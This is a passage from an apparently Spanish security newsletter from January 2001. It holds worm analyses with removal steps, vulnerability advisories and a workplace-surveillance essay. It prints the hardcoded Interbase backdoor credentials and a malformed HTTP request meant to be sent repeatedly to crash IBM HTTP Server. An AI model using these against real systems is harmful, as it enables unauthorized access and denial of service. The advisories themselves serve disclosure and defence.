Es como una diosa.
Igual que yo me contagie de amor
de Davinia, tus archivos se van a
contagiar de amor de esta pagina
Davinia(chica) y Davinia(virus) rompen corazones y archivos.
littledavinia version 1.1 esta en camino...

[Anular] [Reintentar] [Ignorar]

El nombre de usuario infectado y su dirección de correo son recogidos
por LittleDavinia leyendo las siguientes entradas del registro de
Windows:

HKCU\Software\Microsoft\Internet Account Manager\Accounts\00000001\SMTP
Display Name

HKCU\Software\Microsoft\Internet Account Manager\Accounts\00000001\SMTP
Email Address
Firma del autor

Todos los ficheros que crea LittleDavinia: la página web que infecta
desde Internet, el documento de Word (LC.DOC), el fichero Visual Basic
Script (LITTLEDAVINIA.VBS), así como los ficheros HTML, contienen en
su inicio los siguientes comentarios:

littledavinia version 1.0 Visual Basic Macro - VBS - HTML(vbs) Worm virus
Office 2000 UA ActiveX bug
written by: Onel 2 / Melilla, España / 25 Diciembre
quiero a Davinia:
Desinfección manual

Si nos infectamos con LittleDavinia, al visualizar una página Web o
recibir un correo infectado, se descargará el documento de Word
(LC.DOC) y creará el fichero LITTLEDAVINIA.VBS en el directorio de
sistema de Windows (por defecto Windows/system).

El paso fundamental consiste en borrar la entrada de registro que
lanzaría a LITTLEDAVINIA.VBS en el siguiente inicio de sistema,
llevando a cabo su acción más dañina. Para evitarlo tendremos que
ejecutar la utilidad REGEDIT.EXE y borrar la entrada:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Davinia
[directorio de sistema]\littledavinia.html

Por último, no debemos volver a visualizar la página web que le
infectó, o borrar el mensaje de correo que lo inició, así como
localizar y borrar los ficheros LC.DOC y LITTLEDAVINIA.VBS.
Inmunizarnos contra LittleDavinia

Es fácil mantener nuestro sistema inmunizado contra LittleDatinia o
especímenes similares que aprovechen la misma vulnerabilidad. Basta
con instalar el parche que Microsoft facilita para solucionar el
problema del control ActiveX que acompaña a Office 2000, disponible
en la dirección:

http://officeupdate.microsoft.com/info/ocx.htm


Bernardo Quintero
bernardo@hispasec.com


Más información:

HTML/LittleDavinia
http://www.pandasoftware.es/enciclopedia/gusano/HTMLLittleDavinia_1.htm

Panda Software Warns Over Little Davinia Worm
http://www.newsbytes.com/news/01/160525.html

Little Davinia worm wipes company data
http://www.zdnet.co.uk/news/2001/2/ns-20232.html

HTML/LittleDavinia, un nuevo y peligro gusano
http://www.pandasoftware.es/vernoticia.asp?noticia=823

European firms hit by potent new virus
http://www.vnunet.com/News/1116313

Anger at "overblown" virus warning
http://www.vnunet.com/News/1116330

LittleDavinia Worm Discovered in Europe
http://www.ntsecurity.net/Articles/Index.cfm?ArticleID=16569

VBS_DAVINIA.A
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_DAVINIA.A

VBS.Davinia
http://service1.symantec.com/sarc/sarc.nsf/html/VBS.Davinia.html

VBS/Davinia@MM
http://vil.nai.com/vil/dispvirus.asp?virus_k=98964

VBS/Davinia-A
http://www.sophos.com/virusinfo/analyses/vbsdaviniaa.html

What´s So Special About "Davinia"?
http://www.avp.ru/news.asp?tnews=0&nview=4&id=150&page=0

Office 2000 UA Control Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms00-034.asp

No reports of Davinia worm
http://www.sophos.com/virusinfo/articles/davinia.html

Little Davinia virus not widespread
http://www.f-secure.com/v-descs/ldavinia.shtml

Panda punished over virus warning fiasco
http://www.vnunet.com/News/1116640



viernes, 19 de enero de 2001

Problema de seguridad en el sistema webmail TWIG

El sistema webmail TWIG es vulnerable a un ataque que permite la
ejecución en el servidor de secuencias de comandos PHP arbitrarias.
TWIG, anteriormente conocido como Muppet, es un sistema de webmail
escrito en PHP. Las versiones 2.6.0 tienen un problema de seguridad
que permite que cualquier usuario, sin ningún tipo de acceso o
privilegio especial, pueda ejecutar código PHP arbitrario.

El problema se debe a que el usuario puede introducir parámetros en la
URL que el PHP interpretará como variables internas de código PHP. Si
dichas variables no son inicializadas explícitamente en el código,
algo permitido en PHP, el atacante puede introducir en ellas cualquier
valor.

Se trata de un problema de diseño de PHP (polución del espacio de
nombres), que los scripts escritos en dicho lenguaje deben contemplar
de forma explícita.

La solución consiste en actualizar TWIG a la versión 2.6.0 o superior.



Jesús Cea Avión
jcea@hispasec.com


Más información:

Twig Remote Arbitrary Script Execution Vulnerability
http://www.securityfocus.com/bid/1998

TWIG
http://twig.screwdriver.net/



jueves, 18 de enero de 2001

Espías en el trabajo

Decía Mark Twain que existen tres tipos de mentiras: mentiras,
malditas mentiras y estadísticas. Sin creer ciegamente en los bailes
de números, lo cierto es que nos indican con claridad que desde que
las nuevas tecnologías se están popularizando y penetrando cada vez
más en las empresas y administraciones, se crean nuevas formas de
distracción para los empleados.
Según las últimas estadísticas, del 30 a 40% del tráfico de las
empresas no está relacionado con el trabajo (www.idc.com), en el
horario laboral tiene lugar el 70% de las visitas a los sitios
pornográficos (www.sextracker.com) y más del 60% de las compras en
línea, subastas y juegos de azar (www.websense.com). En definitiva,
pornografía, subastas, búsqueda de nuevo empleo, comercio
electrónico, banca a distancia, prensa, juegos, correos personales...
Las posibilidades son infinitas, como los contenidos de Internet. Ese
empleado que parece encontrarse tan atareado delante de la pantalla,
podría estar ocupándose en cualquiera de estos pasatiempos y el jefe
ni enterarse.

En el mejor de los casos, estas distracciones sólo le hacen perder
horas de trabajo y, por tanto, dinero al empresario. En el peor, sus
actividades podrían abrir agujeros de seguridad en la red corporativa
como consecuencia de la infección con algún virus o por permitir a
hackers colarse a través de su ordenador aprovechando algún fallo en
la configuración de sus programas o algún bug de su software: del
navegador, del cliente de chat, del correo electrónico, de Gnutella,
etc. También podrían crear problemas legales a la empresa si utilizan
sus recursos para compartir archivos ilegales, por ejemplo con
Napster, o enviar a las news fotos de pornografía infantil o
panegíricos terroristas con el correo de la empresa (por lo tanto,
viéndose en el campo del remitente de qué empresa se trata).

Estas posibilidades han alarmado a ciertos círculos directivos, que
han optado por vigilar la actividad laboral de los trabajadores.
Evidentemente, el legítimo derecho del empresario a que se haga un
uso eficiente de sus recursos informáticos y del tiempo por el que
paga a sus empleados, previniendo actividades inapropiadas, no
profesionales o incluso ilegales, entra en flagrante conflicto con el
inalienable derecho del trabajador a preservar su intimidad. Dado que
la jurisprudencia en esta materia es prácticamente inexistente,
muchos empresarios aprovechan las lagunas legales y optan por vigilar
el correo y navegación de sus empleados.

Echando mano nuevamente de las estadísticas, según una reciente
encuesta de KPMG (www.kpmg.com), publicada este martes, uno de cada
cinco empresarios espía el correo de sus empleados y su uso de
Internet, práctica que conduce en muchos casos al despido cuando se
descubre un mal uso, como visualización de pornografía (despido en el
55% de los casos) o correos ofensivos o difamatorios (despido en el
20% de los casos). Vault.com (www.vault.com), por su parte, señala
que el 31% de las empresas controla o restringe el uso de Internet y
del correo electrónico de sus empleados, datos no excesivamente
alejados de los de KPMG, llegándose en muchos casos también al
despido.

Para las empresas determinadas a saber qué hacen sus empleados con la
conexión de Internet, existe una amplia oferta de productos
comerciales para controlar, registrar y analizar el uso de los
recursos de la red empresarial, especialmente del correo y de la Web.
Su misión es ayudar a la empresa a reducir pérdidas de productividad,
proteger el ancho de banda, evitarle responsabilidades legales y
minimizar problemas de seguridad en general. Algunos de los productos
más conocidos del mercado son:

- - SurfControl (www.surfcontrol.com), para la gestión responsable del
uso de Internet en el hogar, en la escuela o en el trabajo.

- - Stealth Activity Recorder & Reporter ("STARR") (www.iopus.com),
para saber lo que un usuario de cualquier ordenador de la red está
haciendo en un momento dado en su máquina.

- - spIE (www.satacoy.com/spie/main.htm), que integrado con Internet
Explorer, permite monitorizar y restringir el uso del navegador.

- - TrafficMax (www.intellimax.com), para la monitorización proactiva
de tráfico de redes y de Internet, incluyendo el bloqueo de
direcciones e informes de actividad.

- - Websense (www.websense.com), el producto estrella de gestión,
monitorización y generación de informes sobre el uso de Internet en
el trabajo.

- - El Espía (www.el-espia.com), producto español para controlar de
forma sigilosa lo que los usuarios hacen en el ordenador.

Estos programas violan seriamente la intimidad de los empleados,
especialmente cuando el trabajador no ha sido informado de que su
labor está siendo vigilada. En las últimas semanas se está armando un
gran revuelo acerca del derecho o no del empresario a espiar a sus
trabajadores. La nueva legislación en vigor en Reino Unido, que
legitimaría al empresario a intervenir las comunicaciones de sus
empleados, así como el reciente despido de un empleado del Deutsche
Bank, que enviaba correo privado desde el trabajo, han venido a poner
el dedo en la llaga de una herida que, por otro lado, hace ya tiempo
que sangraba.

En terreno tan pantanoso, la transparencia abre la única vía ética a
seguir. La dirección debería informar, a la hora de firmarse el
contrato, de las prácticas de seguridad seguidas: si se intervienen
los correos electrónicos, si se monitoriza el uso de Internet, etc.
Las cosas claras, el trabajador sabe entonces a qué atenerse. Si bien
es verdad que el empleado tiene derecho a la intimidad, tiene también
la obligación de aprovechar el tiempo de trabajo por el que se le
paga. Del mismo modo, el empresario tiene derecho a que sus recursos
se utilicen únicamente para provecho de la empresa, así como la
obligación de preservar la intimidad de sus empleados. Mientras
tanto, no duden que veremos aumentar el uso de estos programas espía.



Gonzalo Álvarez Marañón
criptonomicon@iec.csic.es


Más información:

Criptonomicon
http://www.iec.csic.es/criptonomicon/



miércoles, 17 de enero de 2001

Diversas vulnerabilidades en Stunnel

Las versiones previas a la 3.11 de Stunnel contienen diversas
vulnerabilidades que hacen que su uso resulte inseguro.
Stunnel es una herramienta que permite hacer un "forwarding" de puertos
TCP/IP entre dos máquinas que lo estén ejecutando, utilizando tecnología
SSL para asegurar la autenticidad, la integridad y la confidencialidad
de las transmisiones.

Las versiones previas a la 3.11 contienen tres vulnerabilidades:

- El generador de números pseudoaleatorios contiene errores que hacen
que sus valores sean predecibles, comprometiendo la calidad
criptográfica de la sesión y de las claves generadas con esta
herramienta.

- El programa genera un fichero "pid" (donde se almacena el PID del
proceso) de forma insegura, siendo vulnerable a ataques a través de
enlaces simbólicos.

- El uso de la función "syslog()" es incorrecto, siendo vulnerable a
ataques de formato.

Se recomienda a todos los usuarios de Stunnel que actualicen a la
versión 3.11 o superior cuanto antes.



Jesús Cea Avión
jcea@hispasec.com


Más información:

Stunnel Homepage:
http://stunnel.mirt.net/

Stunnel:
http://www.stunnel.org/

DSA-009-1 stunnel: insecure file handling, format string bug:
http://www.stunnel.org/

Red Hat Linux General Security Advisory
http://www.redhat.com/support/errata/RHSA-2000-137.html

Red Hat Linux General Security Advisory:
http://www.redhat.com/support/errata/RHSA-2000-129.html

Exploit remoto no stunnel e outros bugfixes:
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000363

stunnel contains potencial remote compromise:
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:05.stunnel.asc



martes, 16 de enero de 2001

Dos vulnerabilidades en PHP para Apache

PHP es un conocido y extendido intérprete para páginas web, que se
distribuye libremente en formato open source. Los módulos de este
lenguaje para Apache se ven afectados por dos vulnerabilidades que
bajo determinadas circunstancias pueden llegar a visualizar el código
fuente de una página o permitir el acceso a recursos no autorizados.
El primero de los problemas puede dar lugar a que un usuario sin
autorización acceda a recursos restringidos. El problema es específico
al módulo para Apache del paquete PHP, y afecta únicamente cuando se
ejecuta en combinación con el mencionado servidor web. El control de
accesos por directorio se realiza a través del archivo .htaccess. Sin
embargo si un usuario malicioso genera una petición http especialmente
construida es posible forzar a PHP para que sirva la siguiente página
con los mismos atributos de control de acceso que la página a la que
accedió anteriormente. Este problema podrá permitir al atacante
acceder a información a la que en principio no tiene permitido el
acceso.

El segundo de los problemas se da en entornos con múltiples hosts
virtuales y se produce debido a la característica de PHP de
inhabilitar su funcionamiento en alguno de dichos entornos. Debido a
un bug en el módulo para Apache de PHP, si uno o más hosts virtuales
dentro de un único servidor Apache se configuran con la opción
"engine=off", este valor se propagará al resto de los hosts virtuales.
Como resultado de esta acción se dejarán de ejecutar los scripts PHP,
por lo que el código fuente de las páginas se visualizará en los
clientes web.

Por las características de ambos problemas las situaciones o entornos
en que se pueden llegar a producir son extrañas, aun así, debido a la
extensión y popularización de este entorno de desarrollo web es
conveniente conocer las implicaciones que pueden tener. Se ven
afectadas por estos problemas todas las versiones de PHP para Apache
desde PHP 4.0.0 hasta PHP 4.0.4. Para solucionar los problemas se
recomienda la actualización a PHP 4.0.4pl1, disponible en:
http://www.php.net/downloads.php



Antonio Ropero
antonior@hispasec.com


Más información:

Securityfocus:
http://www.securityfocus.com/vdb/bottom.html?vid=2206
http://www.securityfocus.com/vdb/bottom.html?vid=2205

Bugtraq:
http://www.securityfocus.com/archive/1/156202



lunes, 15 de enero de 2001

Guninski y Media Player 7

Georgi Guninski parece incansable y está dispuesto a descubrir todas
las vulnerabilidades de Media Player 7 junto con Internet Explorer. En
esta ocasión una vulnerabilidad puede permitir la ejecución de programas
java en la máquina del usuario visitante.
Según informa el conocido experto en seguridad existe una
vulnerabilidad en Windows Media Player 7 explotable a través de
Internet Explorer y java. Este problema puede permitir la lectura de
archivos así como el listado y búsqueda de directorios, esto puede
reconvertirse y llegar a emplearse para la ejecución de código
arbitrario. Esto tiene un gran riesgo al permitir tomar el control del
ordenador.

El problema reside en los skinks, una característica de WMP 7 para
permitir la personalización del reproductor. Estos, se instalan en el
directorio conocido "C:/Program files/Windows Media Player/Skins/ ".
Se puede lograr la instalación automática de un skin desde una página
web mediante la intrucción:



Que recibirá el archivo wmp2.wmz y lo situará en "C:/Program
files/Windows Media Player/Skins/wmp2.wmz".

El problema reside en que dicho archivo puede ser un jar de java. De
tal forma que el siguiente código lo ejecutará con
codebase="file://c:/" y el applet tendrá acceso de lectura a C:\.

--------------



---------------

Todo puede hacerse para que se logre la ejecución con tan sólo visitar
una página. La única forma de evitar este problema pasa por desactivar
el soporte para java del navegador.



Antonio Ropero
antonior@hispasec.com


Más información:

Información de Georgi Guninski:
http://www.guninski.com/wmp7-3-desc.html



domingo, 14 de enero de 2001

Puerta trasera de Borland en Interbase

Borland introdujo años atrás una puerta trasera, compilada en el mismo
código, mediante la cual es posible acceder de forma local o remota al
servidor de Interbase con los máximos privilegios. The Firebird Project,
que distribuye la versión "open source" de Interbase, ha destapado este
grave problema que afecta a las versiones 4, 5 y 6 del extendido paquete
de base de datos.
Según la información facilitada por el CERT, desde 1994 está presente
esta puerta trasera en las diferentes versiones del servidor de Interbase
para todas las plataformas. La cuenta que abre la puerta trasera, a
través del puerto TCP 3050, se encuentra compilada en el mismo código
del servidor, y puede encontrarse definida en el fichero jrd/pwd.h:

#define LOCKSMITH_USER "politically"
#define LOCKSMITH_PASSWORD "correct"

El acceso a través de esta puerta trasera permite el control total de
los objetos de la base de datos, y podría utilizarse para instalar
troyanos y conseguir acceso con privilegios de root en el sistema que
hospeda el servidor de Interbase.

Se recomienda a todos los usuarios afectados instalen las actualizaciones
que facilitan tanto Borland/Inprise para la versión comercial, como
The Firebird Project en su versión "open source".



Bernardo Quintero
bernardo@hispasec.com


Más información:

Interbase Server Contains Compiled-in Back Door Account:
http://www.cert.org/advisories/CA-2001-01.html

Security update for InterBase versions 4.0 through 6.0:
http://www.borland.com/interbase/downloads/patches.html

InterBase Security Alert:
http://www.ibphoenix.com/sec1.html

Interbase V6.0 Open Source SQL Database:
http://sourceforge.net/projects/interbase

Borland Interbase:
http://www.borland.com/interbase/

Borland Interbase Community:
http://community.borland.com/interbase/



sábado, 13 de enero de 2001

Vulnerabilidad de obtención de credenciales NTLM

Microsoft ha publicado su primer boletín de seguridad del año, en el
se informa de una vulnerabilidad que afecta a todos los sistemas con
Office 2000, Windows 2000 o Windows Me, por el cual se pueden ver
comprometidas las credenciales NTLM.
El Cliente Extensor Web (Web Extender Client, WEC) es un componente
que se distribuye como parte de Office 2000, Windows 2000 y Windows
Me. WEC permite a Internet Explorer visualizar y publicar archivos a
través de carpetas web, de forma similar a como se visualizan y añaden
archivos mediante el Explorador de Windows. Debido a un error en la
implementación, WEC no respeta la configuración de seguridad de IE en
relación a la autentificación NTLM, en su lugar WEC realizará la
autentificación NTLM con cualquier servidor que lo solicite.

Este problema puede permitir a un webmaster malicioso obtener una
copia de las credenciales de autentificación NTLM pertenecientes a un
usuario que visite la página web. De esta forma, el usuario malicioso
podrá emplear posteriormente una herramienta para realizar un ataque
por fuerza bruta para obtener la password o mediante utilidades
especializadas podrá enviar una variante de las credenciales en un
intento de acceder a recursos protegidos.

La vulnerabilidad sólo proporcionará al usuario malicioso las
credenciales de autentificación NTLM de otro usuario. Esto, por si
mismo, no permitirá que el usuario malicioso pueda conseguir el acceso
a los recursos para los que el usuario tiene acceso autorizado.

Para forzar las credenciales NTLM o posteriormente crackear la
password, el usuario malicioso deberá tener acceso a un logon remoto
en el sistema objetivo. Sin embargo las prácticas habituales de
seguridad recomiendan que los servicios de acceso remoto sean
inhabilitados en los dispositivos perimetrales, lo cual impedirá a
cualquier atacante el uso de las credenciales obtenidas para acceder
al sistema.

Para solucionar este problema Microsoft publica un parche que se
encuentra disponible en las siguientes direcciones:

Para Microsoft Office 2000 (todas las plataformas):
http://officeupdate.microsoft.com/2000/downloaddetails/wecsec.htm

Para Microsoft Windows 2000 (sin Office 2000):
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26889

Para Microsoft Windows Me (sin Office 2000):
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26705



Antonio Ropero
antonior@hispasec.com


Más información:

Boletín de seguridad Microsoft (MS01-001):
http://www.microsoft.com/technet/security/bulletin/ms01-001.asp



viernes, 12 de enero de 2001

Los hackers avisan contra la "Nueva Economía", desde Berlín

¿Nueva economía? Las risas retronaban ante la sola mención del
término, durante el acto de clausura del 17 congreso anual del Chaos
Computer Club, celebrado del 27 al 29 de diciembre en Berlín, con unos
3.000 asistentes, la mayor concentración de hackers de Europa. La
broma había empezado ya el primer día, con una lista de precios de
entrada que especificaba: "Economía: 230 marcos. Nueva Economía:
2.300".
Wau Holland, presidente del CCC, quien se mostró feliz por la
asistencia al congreso del grupo español Hispahack!, razonaba para el
"Ciberpaís" su desconfianza ante la llamada "nueva economía": "Hay
mucha gente que se ha impresionado y se olvida de la tradición de
libertad de los trabajadores. En la vieja economía, conseguías un
empleo y pensabas que sería para seis años y tendrías dinero. En la
nueva, quizás será por unos meses y pagan con "stock options". ¡Y
ellos, contentos! La industria busca gente fascinada. En cinco o diez
años veremos a todo el mundo enfermo".

En su discurso de apertura del congreso, Holland se quejó también de
la persecución a que está sometida la comunidad por parte de políticos
y jueces. Le apoyó el mismísimo Emmanuel Goldstein, fundador de la
revista norteamericana "2600", quien conminó a la audiencia a
"resistir este tipo de control. La mejor manera de luchar es educar a
la gente y mostrar las cosas, con manifestaciones, llamadas de
teléfono... No hay razón para no intentar algo".

Genio y figura, Goldstein recordó que "los medios son el enemigo", a
la par que presentaba una divertida película-documental, sobre el
encarcelamiento de Kevin Mitnick. Titulada "Freedom Downtime" y
producida por "2600 Films", es la respuesta a "Takedown", una película
de Miramax, donde se muestra el caso desde el punto de vista de los
captores de Mitnick. En marzo, Goldstein afronta su propio juicio, por
haber hecho público el código del programa DeCSS, que permite
manipular reproductores de DVD.

Como marca la tradición, la paranoia fue estrella invisible del
evento, empezando por la presentación de los premios Big Brother del
ámbito germanoparlante, que se justificaba con un: "Porque tenemos
derecho a esperar lo peor" y denunciaba el tratado de cibercrimen en
Europa, la poco segura configuración del servidor web Apache o la
monitorización por video en las estaciones de tren.

El fin de fiesta lo puso la predicción de las "próximas pesadillas de
seguridad": más virus y peores que ILOVEYOU, sistemas de filtrado por
todas partes, vigilancia en el trabajo y en el ordenador privado,
traceo de individuos con GSM, UMTS, GPS, interfaces para escuchas
policiales en proveedores y empresas de telecomunicaciones,
restricciones por derechos de autor desde el disco duro...

Estrellas menos siniestras fueron mujeres y artistas, que gozaban en
esta edición de sus respectivas zonas, donde montaron actividades
propias como criptografía y "hardware hacking" para ellas, masajes de
manos y cervicales o un taller de lucha con armas blancas. La frase
"Explicit Lyrics" y las referencias a "2001 Odisea del Espacio"
estaban por todas partes mientras, en las conferencias, alguien
elucubraba sobre cortar dedos para saltarse barreras biométricas,
destrucción de cámaras de vigilancia, criptografía libre, Free
Software Foundation en Europa, ICANN, Illuminatus, infoguerrillas,
tarjetas de teléfono, detección de intrusos, poesía para "nerds"
(pirados), ondas destructoras de ordenadores... e incluso MUDs, los
veteranos juegos multiusuario, con una programadora de la edad de la
actriz Marisa Paredes asegurando: "El texto es más sensitivo, da más
emoción que las imágenes. Favorece la fantasía".



Mercè Molist
CiberP@is


Más información:

Tres días de hacking y música ambiental
http://www.elmundo.es/navegante/diario/noticia.html?vs_noticia=/2001/1/10/979165177.xml

[Congreso Chaos Computer Club]
http://www.ciberpais.elpais.es/c/d/20010111/cibernau/portada.htm

Chaos Communication Congress
http://www.ccc.de/congress

Premios Big Brother
http://www.bigbrother.org

Woman Hackers
http://www.obn.org/hackers



jueves, 11 de enero de 2001

Vulnerabilidad en IBM HTTP Server

El servidor Web IBM HTTP Server en su versión 1.3.12.2, en el que
corre WebSphere, puede verse afectado por un ataque por denegación de
servicio, al verse interrogado por una sucesión de peticiones
HTTP GET mal construidas.
IBM HTTP Server posé una directiva denominada AfpaCache, que es la
encargada de controlar la respuesta rápida del acelerador de Cache.
Si un atacante realiza múltiples peticiones HTTP GET malformadas
recibirá por parte del servidor una respuesta de petición errónea
(Bad Request). Esto dará como resultado que el módulo AfpaCache no
liberará la memoria y la posterior caída del servicio ya que el
servidor tomará toda la memoria del Kernel. Se deberá reiniciar el
servicio con el fin de recuperar una total funcionalidad.

Para que los administradores puedan comprobar los efectos de esta
vulnerabilidad les pondremos el ejemplo práctico realizado por el
descubridor de este problema.
GET / HTTP/1.0\r\nuser-agent: 20000xnull\r\n\r\n
(deberán realizarse múltiples peticiones con el fin de poder simular
el entorno)

Si bien WebSphere para cualquier plataforma debería verse afectado
por este problema debido a que corre junto IBM HTTP Server, esto
todavía no está demostrado en su generalidad. Ya que en posteriores
informaciones se ha podido comprobar que el problema puede depender
de la plataforma en la cual corra el software.



Antonio Román
antonio_roman@hispasec.com


Más información:

IBM HTTP Server AfpaCache DoS Vulnerability
http://www.securityfocus.com/bid/2175

IBM Websphere 3.52 Kernel Leak DoS
http://www.securityfocus.com/archive/1/154997



miércoles, 10 de enero de 2001

Emanuel, rebrote del gusano Navidad.B

Detectadas numerosas incidencias de usuarios y empresas infectados por
Emanuel, una variante del gusano "Navidad" del que ya informamos a
principios de noviembre del pasado año. Al igual que su antecesor, se
distribuye a través del correo electrónico, y en esta ocasión llega
con el nombre de fichero "emanuel.exe".
W32/Navidad.B es un gusano que se distribuye a través del correo
electrónico, y aunque actúa de forma muy similar a la anterior
versión, nos vemos en la obligación de avisar a todos nuestros
lectores sobre la existencia de un rebrote de este virus de especial
incidencia en España.

El gusano llega al usuario en forma de e-mail con un archivo adjunto
con el nombre EMANUEL.EXE, y se han registrado un gran número de
incidencias en nuestro país, aunque su riesgo a sido evaluado como
medio. Incluso, podemos señalar que en nuestro laboratorio hemos
recibido notificaciones de empresas y usuarios que han recibido
cientos de mensajes con copias de Navidad.B.

La parte vírica del mensaje reside precisamente en el archivo adjunto
EMANUEL.EXE que no deberá ser ejecutado bajo ningún concepto. Si se
llega a ejecutar mostrará una ventana de error con el smiley ";)",
tras aceptar un icono en forma de flor (similar al de ICQ) aparecerá
en los iconos del sistema junto al reloj, en la esquina inferior
derecha de la pantalla.

El gusano grabará una copia de si mismo en el directorio de sistema
de Windows bajo el nombre WINTASK.EXE y creará las siguientes claves
en el registro:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Win32
BaseServiceMOD=C:\WINDOWS\SYSTEM\wintask.exe

y también modificará la siguiente clave, quedando como:

HKEY_CLASSES_ROOT\exefile\shell\open\command\
(Por defecto)=C:\WINDOWS\SYSTEM\wintask.exe "%1" %*

En esta última entrada su acción consiste en modificar su valor
original "%1" %* introduciendo la trayectoria al ejecutable.

También se crean las claves HKEY_CURRENT_USER\SOFTWARE\Emanuel y
HKEY_USERS\.DEFAULT\SOFTWARE\Emanuel pero sin ningún valor en ellas.

Es decir, Navidad.B corrige el error existente en la primera versión
del virus que copiaba el virus como un .VXD y después lo intentaba
llamar desde el registro como .EXE. En esta ocasión el gusano
funcionará bien, ejecutándose cada vez que se inicie el sistema y
cuando intentemos ejecutar cualquier .EXE.

Como hemos mencionado tras ejecutar el gusano se evidenciará la
presencia de un icono con una flor, si se pulsa aparecerá un botón con
el texto "Nunca presionar este botón". En caso de presionarlo
aparecerá una ventana con el mensaje "Emmanuel-God is with us! May god
bless u And Ash, Lk and LJ!!". El programa no destruye nada en el
ordenador del usuario afectado.

El virus se reproduce al responder de forma automática a todos los
mensajes con archivos adjuntos que llegan al buzón de entrada del
usuario afectado. Para ello hace uso del MAPI de Microsoft Outlook al
igual que trabajaban otros gusanos como LoveLetter o Melissa. La
respuesta generada consistirá en el asunto "Re:" y cuerpo del mensaje
vacío pero con el archivo EMANUEL.EXE como adjunto.

Desinfección

Como es habitual en Hispasec vamos a describir la forma de eliminar el
gusano de un sistema infectado de forma "manual" mediante el uso del
registro (regedit.exe). Este método suele ser siempre el más efectivo,
y además nos ayudará a comprender de que forma está instalado el
gusano. Hemos podido observar que la mayoría de las casas antivirus
cometen errores al indicar este tipo de métodos manuales que
acompañan con pequeñas utilidades para automatizar el proceso, ya que
mezclan conceptos del gusano original Navidad con "Emanuel".

Antes de comenzar, deberemos hacer una copia del fichero REGEDIT.EXE
a REGEDIT.COM, en la carpeta Windows. Ya que, como hemos descrito,
con las entradas del registo que modifica "Emanuel" intercepta
cualquier llamada a un fichero .EXE y ejecuta en su lugar
WINTASK.EXE. Con REGEDIT.COM podremos acceder a las claves del
registro y hacer las correcciones necesarias.

Para eliminar el gusano de los sistemas afectados, será necesario
eliminar las claves creadas en el registro y restaurar el valor
original de la clave modificada por el gusano.

Es decir, se deben eliminar las claves:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Win32
BaseServiceMOD=C:\WINDOWS\SYSTEM\wintask.exe

HKEY_CURRENT_USER\SOFTWARE\Emanuel

HKEY_USERS\.DEFAULT\SOFTWARE\Emanuel

y modificar las siguientes claves, dejándolas como:

HKEY_CLASSES_ROOT\exefile\shell\open\command\ con el valor
(Por defecto)="%1" %*

HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command
(Por defecto) ="%1" %*"

Tras realizar las modificaciones en el registro, no hay que
olvidarse de borrar el archivo WINTASK.EXE, que se encontrará
en el directorio sistema de Windows, System en Windows 9x y
System32 en Windows NT/2000. Si está ejecutándose, deberemos
eliminar el proceso desde el administrador de tareas, o reiniciar
en MSDos, o borrarlo despues de iniciar Windows de nuevo.



Antonio Ropero
antonior@hispasec.com
Bernardo Quintero
bernardo@hispasec.com


Más información:

Fichero de proceso por lotes para facilitar la eliminación (Win9x/NT)
http://www.hispasec.com/antiema.bat

W32/Navidad.B
http://www.pandasoftware.es/enciclopedia/gusano/W32NavidadB_1.htm

TROJ_NAVIDAD.E
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NAVIDAD.E

W32/Navidad@M
http://vil.nai.com/vil/dispVirus.asp?virus_k=98881



martes, 9 de enero de 2001

Grave vulnerabilidad en servidores Oracle

Guninski en un nuevo aviso alerta de una vulnerabilidad en las
instalaciones por defecto de Oracle 8.1.7 para Windows 2000. A través
del servlet Oracle XSQL y hojas de estilo xml es posible ejecutar java
en el servidor.
Georgi Guninski parece más activo que nunca, es el tercer aviso de
seguridad que publica en pocos días, todos ellos de elevada gravedad.
En esta ocasión el problema afecta a las instalaciones de Oracle 8.1.7
bajo Windows 2000 aunque como indica el propio Guninski es muy posible
que otras versiones y plataformas también se vean afectadas ya que el
servlet problemático está escrito en java.

El servlet XSQL permite especificar una hoja de estilo xslt externa
que puede estar alojado en cualquier sitio. El problema reside en que
es posible ejecutar código java en el servidor web si este se incluye
en el xslt. La ejecución de java en el servidor, puede provocar sin
ninguna duda el compromiso total del servidor.

Oracle permite extensiones a las funciones incluidas en xslt mediante
el uso de xmlns. Mediante el uso de este namespace es posible
instanciar objetos java y ejecutar sus métodos. Guninski proporciona
los archivos xsl y sxlt necesarios para llegar a reproducir el fallo.

Para evitar este problema se recomienda añadir la línea
allow-client-style="no"
en el elemento document de cada página xsql. En los próximos días
Oracle publicará un parche para remediar el problema.



Antonio Ropero
antonior@hispasec.com


Más información:

Oracle XSQL servlet and xml-stylesheet allow executing java on the web server
http://www.guninski.com/oraxsql.html



lunes, 8 de enero de 2001

Problema de seguridad en routers ADSL: Nota oficial de Jazztel

Del mismo modo que reproducimos el aviso íntegro de Antonio Cortés en
relación a los problemas detectados en las instalaciones ADSL de
Jazztel, a continuación publicamos la nota oficial de Jazztel al
respecto donde rectifican algunos de los puntos denunciados. En
cualquier caso, es elogiable la rápida actuación de ambas partes a
la hora de informar a los usuarios y solucionar el problema. Hispasec
emitirá un tercer boletín si se descubre nuevos datos.


NOTA

Ante las noticias publicadas en algún medio electrónico a lo largo del
día de ayer sobre un supuesto "grave problema de seguridad en las
instalaciones de Jazztel" y para evitar los posibles malentendidos que
de esta noticia hayan podido generarse, Jazztel desea hacer público lo
siguiente: En ningún momento se ha podido cambiar la configuración de
los routers ADSL que se instalan en casa del cliente ni acceder desde
los mismos a la red interna en el modo en que se ha publicado. Estos
equipos disponen de dos niveles de acceso: usuario y administrador. El
acceso como "administrador" -único que permite la realización de
cambios en la configuración del router- siempre ha estado protegido
por contraseña.

Los accesos que se mencionan en las noticias han sido siempre en modo
"usuario" -solo lectura- y nunca han representado ninguna amenaza para
la seguridad de las redes de nuestros clientes a pesar de lo que se ha
publicado en los medios.

Antonio Cortés, quien envió la noticia original a distintos foros, ha
podido constatar que las afirmaciones publicadas no son ciertas, y así
